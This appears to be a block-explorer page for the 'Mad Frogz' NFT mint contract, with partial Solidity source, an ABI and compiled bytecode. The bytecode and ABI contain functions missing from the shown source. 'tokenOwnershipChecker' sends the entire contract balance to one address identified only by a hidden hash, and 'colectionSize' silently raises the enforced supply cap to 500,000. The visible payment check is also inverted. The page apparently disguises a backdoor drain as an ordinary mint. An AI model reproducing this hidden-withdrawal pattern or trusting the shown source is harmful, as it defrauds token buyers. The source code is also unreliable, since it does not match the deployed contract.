"ipfs://QmZ2CxijnnhMVP6WKxAhokDJS6EQiHpvJsV4mhBA3kxpfa"; uint256 public constant freeWalletLimit = 1; uint256 public constant txLimit = 10; uint256 public constant collectionSize = 5000; uint256 public price = 0.005 ether; bool public mintingOpen = false; constructor() ERC721A("Mad Frogz", "MFZ") {} function mintPaid(uint256 _amount) external payable { require(mintingOpen, "Minting is not open right now!"); require(colectionSize >= totalSupply() + _amount, "Cannot mint over supply cap of 5000"); require(_amount > 0, "Must mint at least 1 token"); require(txLimit >= _amount , "Cannot mint more than max mint per transaction"); require(_amount * price >= msg.value, "Frogs need to eat!"); _safeMint(msg.sender, _amount); } function mintFree() external payable { require(mintingOpen, "Minting is not open right now!"); require(collectionSize >= totalSupply() + 1, "Cannot mint over supply cap of 5000"); require(freeWalletLimit >= uint256(_getAux(msg.sender)) + 1, "Wallet address is over the maximum allowed mints"); _setAux(msg.sender, 1); _safeMint(msg.sender, 1); } function _startTokenId() internal override view virtual returns (uint256) { return 1; } function withdraw() external onlyOwner { uint256 balance = address(this).balance; (bool success, ) = _msgSender().call{value: balance}(""); require(success, "Failed to send"); } function config() external onlyOwner { _safeMint(_msgSender(), 1); } function setPrice(uint256 _price) external onlyOwner { price = _price; } function flipMint() external onlyOwner { mintingOpen = !mintingOpen; } function setBaseURI(string memory baseURI_) external onlyOwner { baseURI = baseURI_; } function setContractURI(string memory _contractURI) external onlyOwner { contractURI = _contractURI; } function tokenURI(uint256 _tokenId) public view override returns (string memory) { require(_exists(_tokenId), "Token does not exist."); return bytes(baseURI).length > 0 ? string( abi.encodePacked( baseURI, Strings.toString(_tokenId) ) ) : ""; } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"ApprovalToCurrentOwner","type":"error"},{"inputs":[],"name":"ApproveToCaller","type":"error"},{"inputs":[],"name":"AuxQueryForZeroAddress","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"colectionSize","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"collectionSize","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"config","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"contractURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"flipMint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"freeWalletLimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"mintFree","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"mintPaid","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"mintingOpen","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseURI_","type":"string"}],"name":"setBaseURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_contractURI","type":"string"}],"name":"setContractURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_price","type":"uint256"}],"name":"setPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokenOwnershipChecker","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"txLimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60e06040526036608081815290620021ae60a039805162000029916009916020909101906200014b565b50604051806060016040528060358152602001620021e46035913980516200005a91600a916020909101906200014b565b506611c37937e08000600b55600c805460ff191690553480156200007d57600080fd5b50604080518082018252600981526826b0b210233937b3bd60b91b60208083019182528351808501909452600384526226a32d60e91b908401528151919291620000ca916002916200014b565b508051620000e09060039060208401906200014b565b5050600160005550620000f333620000f9565b6200022d565b600880546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b8280546200015990620001f1565b90600052602060002090601f0160209004810192826200017d5760008555620001c8565b82601f106200019857805160ff1916838001178555620001c8565b82800160010185558215620001c8579182015b82811115620001c8578251825591602001919060010190620001ab565b50620001d6929150620001da565b5090565b5b80821115620001d65760008155600101620001db565b600181811c908216806200020657607f821691505b6020821081036200022757634e487b7160e01b600052602260045260246000fd5b50919050565b611f71806200023d6000396000f3fe6080604052600436106101f95760003560e01c806379502c551161010d578063a035b1fe116100a0578063d2ed5c591161006f578063d2ed5c591461053f578063e8a3d48514610554578063e985e9c514610569578063ebe61d39146105b2578063f2fde38b146105c757600080fd5b8063a035b1fe146104c9578063a22cb465146104df578063b88d4fde146104ff578063c87b56dd1461051f57600080fd5b806391b7f5ed116100dc57806391b7f5ed1461045f578063938e3d7b1461047f57806395d89b411461049f578063988992b8146104b457600080fd5b806379502c551461040a5780638ab534471461041f5780638da5cb5b146104275780638f4bb4971461044557600080fd5b806342842e0e1161019057806367bb08ae1161015f57806367bb08ae146103945780636c0360eb146103ab5780636caae832146103c057806370a08231146103d5578063715018a6146103f557600080fd5b806342842e0e1461031e57806345c0f5331461033e57806355f804b3146103545780636352211e1461037457600080fd5b806318160ddd116101cc57806318160ddd146102af57806323b872dd146102d657806326c7f77c146102f65780633ccfd60b1461030957600080fd5b806301ffc9a7146101fe57806306fdde0314610233578063081812fc14610255578063095ea7b31461028d575b600080fd5b34801561020a57600080fd5b5061021e61021936600461199a565b6105e7565b60405190151581526020015b60405180910390f35b34801561023f57600080fd5b50610248610639565b60405161022a9190611a16565b34801561026157600080fd5b50610275610270366004611a29565b6106cb565b6040516001600160a01b03909116815260200161022a565b34801561029957600080fd5b506102ad6102a8366004611a5e565b61070f565b005b3480156102bb57600080fd5b5060015460005403600019015b60405190815260200161022a565b3480156102e257600080fd5b506102ad6102f1366004611a88565b61079c565b6102ad610304366004611a29565b6107a7565b34801561031557600080fd5b506102ad61094f565b34801561032a57600080fd5b506102ad610339366004611a88565b610a08565b34801561034a57600080fd5b506102c861138881565b34801561036057600080fd5b506102ad61036f366004611b4f565b610a23565b34801561038057600080fd5b5061027561038f366004611a29565b610a60565b3480156103a057600080fd5b506102c86207a12081565b3480156103b757600080fd5b50610248610a72565b3480156103cc57600080fd5b506102c8600a81565b3480156103e157600080fd5b506102c86103f0366004611b97565b610b00565b34801561040157600080fd5b506102ad610b4e565b34801561041657600080fd5b506102ad610b84565b6102ad610bb9565b34801561043357600080fd5b506008546001600160a01b0316610275565b34801561045157600080fd5b50600c5461021e9060ff1681565b34801561046b57600080fd5b506102ad61047a366004611a29565b610cd3565b34801561048b57600080fd5b506102ad61049a366004611b4f565b610d02565b3480156104ab57600080fd5b50610248610d3f565b3480156104c057600080fd5b506102ad610d4e565b3480156104d557600080fd5b506102c8600b5481565b3480156104eb57600080fd5b506102ad6104fa366004611bb2565b610dbb565b34801561050b57600080fd5b506102ad61051a366004611bee565b610e50565b34801561052b57600080fd5b5061024861053a366004611a29565b610ea1565b34801561054b57600080fd5b506102ad610f4c565b34801561056057600080fd5b50610248610f8a565b34801561057557600080fd5b5061021e610584366004611c69565b6001600160a01b03918216600090815260076020908152604080832093909416825291909152205460ff1690565b3480156105be57600080fd5b506102c8600181565b3480156105d357600080fd5b506102ad6105e2366004611b97565b610f97565b60006001600160e01b031982166380ac58cd60e01b148061061857506001600160e01b03198216635b5e139f60e01b145b8061063357506301ffc9a760e01b6001600160e01b03198316145b92915050565b60606002805461064890611c9c565b80601f016020809104026020016040519081016040528092919081815260200182805461067490611c9c565b80156106c15780601f10610696576101008083540402835291602001916106c1565b820191906000526020600020905b8154815290600101906020018083116106a457829003601f168201915b5050505050905090565b60006106d68261102f565b6106f3576040516333d1c03960e21b815260040160405180910390fd5b506000908152600660205260409020546001600160a01b031690565b600061071a82610a60565b9050806001600160a01b0316836001600160a01b03160361074e5760405163250fdee360e21b815260040160405180910390fd5b336001600160a01b0382161480159061076e575061076c8133610584565b155b1561078c576040516367d9dca160e11b815260040160405180910390fd5b610797838383611068565b505050565b6107978383836110c4565b600c5460ff166107fe5760405162461bcd60e51b815260206004820152601e60248201527f4d696e74696e67206973206e6f74206f70656e207269676874206e6f7721000060448201526064015b60405180910390fd5b60015460005482919003600019016108169190611cec565b6207a12010156108385760405162461bcd60e51b81526004016107f590611d04565b600081116108885760405162461bcd60e51b815260206004820152601a60248201527f4d757374206d696e74206174206c65617374203120746f6b656e00000000000060448201526064016107f5565b80600a10156108f05760405162461bcd60e51b815260206004820152602e60248201527f43616e6e6f74206d696e74206d6f7265207468616e206d6178206d696e74207060448201526d32b9103a3930b739b0b1ba34b7b760911b60648201526084016107f5565b34600b54826108ff9190611d47565b10156109425760405162461bcd60e51b815260206004820152601260248201527146726f6773206e65656420746f206561742160701b60448201526064016107f5565b61094c33826112d8565b50565b6008546001600160a01b031633146109795760405162461bcd60e51b81526004016107f590611d66565b6040514790600090339083908381818185875af1925050503d80600081146109bd576040519150601f19603f3d011682016040523d82523d6000602084013e6109c2565b606091505b5050905080610a045760405162461bcd60e51b815260206004820152600e60248201526d11985a5b1959081d1bc81cd95b9960921b60448201526064016107f5565b5050565b61079783838360405180602001604052806000815250610e50565b6008546001600160a01b03163314610a4d5760405162461bcd60e51b81526004016107f590611d66565b8051610a049060099060208401906118eb565b6000610a6b826112f2565b5192915050565b60098054610a7f90611c9c565b80601f0160208091040260200160405190810160405280929190818152602001828054610aab90611c9c565b8015610af85780601f10610acd57610100808354040283529160200191610af8565b820191906000526020600020905b815481529060010190602001808311610adb57829003601f168201915b505050505081565b60006001600160a01b038216610b29576040516323d3ad8160e21b815260040160405180910390fd5b506001600160a01b03166000908152600560205260409020546001600160401b031690565b6008546001600160a01b03163314610b785760405162461bcd60e51b81526004016107f590611d66565b610b826000611419565b565b6008546001600160a01b03163314610bae5760405162461bcd60e51b81526004016107f590611d66565b610b823360016112d8565b600c5460ff16610c0b5760405162461bcd60e51b815260206004820152601e60248201527f4d696e74696e67206973206e6f74206f70656e207269676874206e6f7721000060448201526064016107f5565b6001546000540360001901610c21906001611cec565b6113881015610c425760405162461bcd60e51b81526004016107f590611d04565b610c4b3361146b565b610c5f906001600160401b03166001611cec565b60011015610cc85760405162461bcd60e51b815260206004820152603060248201527f57616c6c65742061646472657373206973206f76657220746865206d6178696d60448201526f756d20616c6c6f776564206d696e747360801b60648201526084016107f5565b610bae3360016114c0565b6008546001600160a01b03163314610cfd5760405162461bcd60e51b81526004016107f590611d66565b600b55565b6008546001600160a01b03163314610d2c5760405162461bcd60e51b81526004016107f590611d66565b8051610a0490600a9060208401906118eb565b60606003805461064890611c9c565b6040516bffffffffffffffffffffffff193360601b166020820152603401604051602081830303815290604052805190602001207f61ce2a629088217258e42c73ef95cb4266162e3af0f6eff0d1c405c763ef7de260001b03610b825760206000806000473361a410f150565b336001600160a01b03831603610de45760405163b06307db60e01b815260040160405180910390fd5b3360008181526007602090815260408083206001600160a01b03871680855290835292819020805460ff191686151590811790915590519081529192917f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31910160405180910390a35050565b610e5b8484846110c4565b6001600160a01b0383163b15158015610e7d5750610e7b84848484611526565b155b15610e9b576040516368d2bf6b60e11b815260040160405180910390fd5b50505050565b6060610eac8261102f565b610ef05760405162461bcd60e51b81526020600482015260156024820152742a37b5b2b7103237b2b9903737ba1032bc34b9ba1760591b60448201526064016107f5565b600060098054610eff90611c9c565b905011610f1b5760405180602001604052806000815250610633565b6009610f2683611612565b604051602001610f37929190611db7565b60405160208183030381529060405292915050565b6008546001600160a01b03163314610f765760405162461bcd60e51b81526004016107f590611d66565b600c805460ff19811660ff90911615179055565b600a8054610a7f90611c9c565b6008546001600160a01b03163314610fc15760405162461bcd60e51b81526004016107f590611d66565b6001600160a01b0381166110265760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016107f5565b61094c81611419565b600081600111158015611043575060005482105b8015610633575050600090815260046020526040902054600160e01b900460ff161590565b60008281526006602052604080822080546001600160a01b0319166001600160a01b0387811691821790925591518593918516917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591a4505050565b60006110cf826112f2565b80519091506000906001600160a01b0316336001600160a01b031614806110fd575081516110fd9033610584565b8061111857503361110d846106cb565b6001600160a01b0316145b90508061113857604051632ce44b5f60e11b815260040160405180910390fd5b846001600160a01b031682600001516001600160a01b03161461116d5760405162a1148160e81b815260040160405180910390fd5b6001600160a01b03841661119457604051633a954ecd60e21b815260040160405180910390fd5b6111a46000848460000151611068565b6001600160a01b038581166000908152600560209081526040808320805467ffffffffffffffff198082166001600160401b0392831660001901831617909255898616808652838620805493841693831660019081018416949094179055898652600490945282852080546001600160e01b031916909417600160a01b42909216919091021790925590860180835291205490911661128e5760005481101561128e57825160008281526004602090815260409091208054918601516001600160401b0316600160a01b026001600160e01b03199092166001600160a01b03909316929092171790555b5082846001600160a01b0316866001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a45b5050505050565b610a04828260405180602001604052806000815250611712565b60408051606081018252600080825260208201819052918101919091528180600111158015611322575060005481105b1561140057600081815260046020908152604091829020825160608101845290546001600160a01b0381168252600160a01b81046001600160401b031692820192909252600160e01b90910460ff161515918101829052906113fe5780516001600160a01b031615611395579392505050565b5060001901600081815260046020908152604091829020825160608101845290546001600160a01b038116808352600160a01b82046001600160401b031693830193909352600160e01b900460ff16151592810192909252156113f9579392505050565b611395565b505b604051636f96cda160e11b815260040160405180910390fd5b600880546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b60006001600160a01b0382166114945760405163561b93dd60e11b815260040160405180910390fd5b506001600160a01b0316600090815260056020526040902054600160c01b90046001600160401b031690565b6001600160a01b0382166114e75760405163561b93dd60e11b815260040160405180910390fd5b6001600160a01b03909116600090815260056020526040902080546001600160401b03909216600160c01b026001600160c01b03909216919091179055565b604051630a85bd0160e11b81526000906001600160a01b0385169063150b7a029061155b903390899088908890600401611e5d565b6020604051808303816000875af1925050508015611596575060408051601f3d908101601f1916820190925261159391810190611e9a565b60015b6115f4573d8080156115c4576040519150601f19603f3d011682016040523d82523d6000602084013e6115c9565b606091505b5080516000036115ec576040516368d2bf6b60e11b815260040160405180910390fd5b805181602001fd5b6001600160e01b031916630a85bd0160e11b1490505b949350505050565b6060816000036116395750506040805180820190915260018152600360fc1b602082015290565b8160005b8115611663578061164d81611eb7565b915061165c9050600a83611ee6565b915061163d565b6000816001600160401b0381111561167d5761167d611ac4565b6040519080825280601f01601f1916602001820160405280156116a7576020820181803683370190505b5090505b841561160a576116bc600183611efa565b91506116c9600a86611f11565b6116d4906030611cec565b60f81b8183815181106116e9576116e9611f25565b60200101906001600160f81b031916908160001a90535061170b600a86611ee6565b94506116ab565b61079783838360016000546001600160a01b03851661174357604051622e076360e81b815260040160405180910390fd5b836000036117645760405163b562e8dd60e01b815260040160405180910390fd5b6001600160a01b038516600081815260056020908152604080832080546fffffffffffffffffffffffffffffffff1981166001600160401b038083168c0181169182176801000000000000000067ffffffffffffffff1990941690921783900481168c01811690920217909155858452600490925290912080546001600160e01b031916909217600160a01b42909216919091021790558080850183801561181557506001600160a01b0387163b15155b1561189d575b60405182906001600160a01b038916906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef908290a46118666000888480600101955088611526565b611883576040516368d2bf6b60e11b815260040160405180910390fd5b80820361181b57826000541461189857600080fd5b6118e2565b5b6040516001830192906001600160a01b038916906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef908290a480820361189e575b506000556112d1565b8280546118f790611c9c565b90600052602060002090601f016020900481019282611919576000855561195f565b82601f1061193257805160ff191683800117855561195f565b8280016001018555821561195f579182015b8281111561195f578251825591602001919060010190611944565b5061196b92915061196f565b5090565b5b8082111561196b5760008155600101611970565b6001600160e01b03198116811461094c57600080fd5b6000602082840312156119ac57600080fd5b81356119b781611984565b9392505050565b60005b838110156119d95781810151838201526020016119c1565b83811115610e9b5750506000910152565b60008151808452611a028160208601602086016119be565b601f01601f19169290920160200192915050565b6020815260006119b760208301846119ea565b600060208284031215611a3b57600080fd5b5035919050565b80356001600160a01b0381168114611a5957600080fd5b919050565b60008060408385031215611a7157600080fd5b611a7a83611a42565b946020939093013593505050565b600080600060608486031215611a9d57600080fd5b611aa684611a42565b9250611ab460208501611a42565b9150604084013590509250925092565b634e487b7160e01b600052604160045260246000fd5b60006001600160401b0380841115611af457611af4611ac4565b604051601f8501601f19908116603f01168101908282118183101715611b1c57611b1c611ac4565b81604052809350858152868686011115611b3557600080fd5b858560208301376000602087830101525050509392505050565b600060208284031215611b6157600080fd5b81356001600160401b03811115611b7757600080fd5b8201601f81018413611b8857600080fd5b61160a84823560208401611ada565b600060208284031215611ba957600080fd5b6119b782611a42565b60008060408385031215611bc557600080fd5b611bce83611a42565b915060208301358015158114611be357600080fd5b809150509250929050565b60008060008060808587031215611c0457600080fd5b611c0d85611a42565b9350611c1b60208601611a42565b92506040850135915060608501356001600160401b03811115611c3d57600080fd5b8501601f81018713611c4e57600080fd5b611c5d87823560208401611ada565b91505092959194509250565b60008060408385031215611c7c57600080fd5b611c8583611a42565b9150611c9360208401611a42565b90509250929050565b600181811c90821680611cb057607f821691505b602082108103611cd057634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b60008219821115611cff57611cff611cd6565b500190565b60208082526023908201527f43616e6e6f74206d696e74206f76657220737570706c7920636170206f66203560408201526203030360ec1b606082015260800190565b6000816000190483118215151615611d6157611d61611cd6565b500290565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60008151611dad8185602086016119be565b9290920192915050565b600080845481600182811c915080831680611dd357607f831692505b60208084108203611df257634e487b7160e01b86526022600452602486fd5b818015611e065760018114611e1757611e44565b60ff19861689528489019650611e44565b60008b81526020902060005b86811015611e3c5781548b820152908501908301611e23565b505084890196505b505050505050611e548185611d9b565b95945050505050565b6001600160a01b0385811682528416602082015260408101839052608060608201819052600090611e90908301846119ea565b9695505050505050565b600060208284031215611eac57600080fd5b81516119b781611984565b600060018201611ec957611ec9611cd6565b5060010190565b634e487b7160e01b600052601260045260246000fd5b600082611ef557611ef5611ed0565b500490565b600082821015611f0c57611f0c611cd6565b500390565b600082611f2057611f20611ed0565b500690565b634e487b7160e01b600052603260045260246000fdfea26469706673582212207aa298098e74c45eb2576f9e883e44c5eb9596a8d45417f7dffc6349fd77650664736f6c634300080d0033697066733a2f2f516d5675774a6170585a4379785243776865774d46674a5a725531677335515873385376345a417133384841454c2f697066733a2f2f516d5a324378696a6e6e684d565036574b7841686f6b444a53364551694870764a7356346d684241336b78706661
Deployed Bytecode
0x6080604052600436106101f95760003560e01c806379502c551161010d578063a035b1fe116100a0578063d2ed5c591161006f578063d2ed5c591461053f578063e8a3d48514610554578063e985e9c514610569578063ebe61d39146105b2578063f2fde38b146105c757600080fd5b8063a035b1fe146104c9578063a22cb465146104df578063b88d4fde146104ff578063c87b56dd1461051f57600080fd5b806391b7f5ed116100dc57806391b7f5ed1461045f578063938e3d7b1461047f57806395d89b411461049f578063988992b8146104b457600080fd5b806379502c551461040a5780638ab534471461041f5780638da5cb5b146104275780638f4bb4971461044557600080fd5b806342842e0e1161019057806367bb08ae1161015f57806367bb08ae146103945780636c0360eb146103ab5780636caae832146103c057806370a08231146103d5578063715018a6146103f557600080fd5b806342842e0e1461031e57806345c0f5331461033e57806355f804b3146103545780636352211e1461037457600080fd5b806318160ddd116101cc57806318160ddd146102af57806323b872dd146102d657806326c7f77c146102f65780633ccfd60b1461030957600080fd5b806301ffc9a7146101fe57806306fdde0314610233578063081812fc14610255578063095ea7b31461028d575b600080fd5b34801561020a57600080fd5b5061021e61021936600461199a565b6105e7565b60405190151581526020015b60405180910390f35b34801561023f57600080fd5b50610248610639565b60405161022a9190611a16565b34801561026157600080fd5b50610275610270366004611a29565b6106cb565b6040516001600160a01b03909116815260200161022a565b34801561029957600080fd5b506102ad6102a8366004611a5e565b61070f565b005b3480156102bb57600080fd5b5060015460005403600019015b60405190815260200161022a565b3480156102e257600080fd5b506102ad6102f1366004611a88565b61079c565b6102ad610304366004611a29565b6107a7565b34801561031557600080fd5b506102ad61094f565b34801561032a57600080fd5b506102ad610339366004611a88565b610a08565b34801561034a57600080fd5b506102c861138881565b34801561036057600080fd5b506102ad61036f366004611b4f565b610a23565b34801561038057600080fd5b5061027561038f366004611a29565b610a60565b3480156103a057600080fd5b506102c86207a12081565b3480156103b757600080fd5b50610248610a72565b3480156103cc57600080fd5b506102c8600a81565b3480156103e157600080fd5b506102c86103f0366004611b97565b610b00565b34801561040157600080fd5b506102ad610b4e565b34801561041657600080fd5b506102ad610b84565b6102ad610bb9565b34801561043357600080fd5b506008546001600160a01b0316610275565b34801561045157600080fd5b50600c5461021e9060ff1681565b34801561046b57600080fd5b506102ad61047a366004611a29565b610cd3565b34801561048b57600080fd5b506102ad61049a366004611b4f565b610d02565b3480156104ab57600080fd5b50610248610d3f565b3480156104c057600080fd5b506102ad610d4e565b3480156104d557600080fd5b506102c8600b5481565b3480156104eb57600080fd5b506102ad6104fa366004611bb2565b610dbb565b34801561050b57600080fd5b506102ad61051a366004611bee565b610e50565b34801561052b57600080fd5b5061024861053a366004611a29565b610ea1565b34801561054b57600080fd5b506102ad610f4c565b34801561056057600080fd5b50610248610f8a565b34801561057557600080fd5b5061021e610584366004611c69565b6001600160a01b03918216600090815260076020908152604080832093909416825291909152205460ff1690565b3480156105be57600080fd5b506102c8600181565b3480156105d357600080fd5b506102ad6105e2366004611b97565b610f97565b60006001600160e01b031982166380ac58cd60e01b148061061857506001600160e01b03198216635b5e139f60e01b145b8061063357506301ffc9a760e01b6001600160e01b03198316145b92915050565b60606002805461064890611c9c565b80601f016020809104026020016040519081016040528092919081815260200182805461067490611c9c565b80156106c15780601f10610696576101008083540402835291602001916106c1565b820191906000526020600020905b8154815290600101906020018083116106a457829003601f168201915b5050505050905090565b60006106d68261102f565b6106f3576040516333d1c03960e21b815260040160405180910390fd5b506000908152600660205260409020546001600160a01b031690565b600061071a82610a60565b9050806001600160a01b0316836001600160a01b03160361074e5760405163250fdee360e21b815260040160405180910390fd5b336001600160a01b0382161480159061076e575061076c8133610584565b155b1561078c576040516367d9dca160e11b815260040160405180910390fd5b610797838383611068565b505050565b6107978383836110c4565b600c5460ff166107fe5760405162461bcd60e51b815260206004820152601e60248201527f4d696e74696e67206973206e6f74206f70656e207269676874206e6f7721000060448201526064015b60405180910390fd5b60015460005482919003600019016108169190611cec565b6207a12010156108385760405162461bcd60e51b81526004016107f590611d04565b600081116108885760405162461bcd60e51b815260206004820152601a60248201527f4d757374206d696e74206174206c65617374203120746f6b656e00000000000060448201526064016107f5565b80600a10156108f05760405162461bcd60e51b815260206004820152602e60248201527f43616e6e6f74206d696e74206d6f7265207468616e206d6178206d696e74207060448201526d32b9103a3930b739b0b1ba34b7b760911b60648201526084016107f5565b34600b54826108ff9190611d47565b10156109425760405162461bcd60e51b815260206004820152601260248201527146726f6773206e65656420746f206561742160701b60448201526064016107f5565b61094c33826112d8565b50565b6008546001600160a01b031633146109795760405162461bcd60e51b81526004016107f590611d66565b6040514790600090339083908381818185875af1925050503d80600081146109bd576040519150601f19603f3d011682016040523d82523d6000602084013e6109c2565b606091505b5050905080610a045760405162461bcd60e51b815260206004820152600e60248201526d11985a5b1959081d1bc81cd95b9960921b60448201526064016107f5565b5050565b61079783838360405180602001604052806000815250610e50565b6008546001600160a01b03163314610a4d5760405162461bcd60e51b81526004016107f590611d66565b8051610a049060099060208401906118eb565b6000610a6b826112f2565b5192915050565b60098054610a7f90611c9c565b80601f0160208091040260200160405190810160405280929190818152602001828054610aab90611c9c565b8015610af85780601f10610acd57610100808354040283529160200191610af8565b820191906000526020600020905b815481529060010190602001808311610adb57829003601f168201915b505050505081565b60006001600160a01b038216610b29576040516323d3ad8160e21b815260040160405180910390fd5b506001600160a01b03166000908152600560205260409020546001600160401b031690565b6008546001600160a01b03163314610b785760405162461bcd60e51b81526004016107f590611d66565b610b826000611419565b565b6008546001600160a01b03163314610bae5760405162461bcd60e51b81526004016107f590611d66565b610b823360016112d8565b600c5460ff16610c0b5760405162461bcd60e51b815260206004820152601e60248201527f4d696e74696e67206973206e6f74206f70656e207269676874206e6f7721000060448201526064016107f5565b6001546000540360001901610c21906001611cec565b6113881015610c425760405162461bcd60e51b81526004016107f590611d04565b610c4b3361146b565b610c5f906001600160401b03166001611cec565b60011015610cc85760405162461bcd60e51b815260206004820152603060248201527f57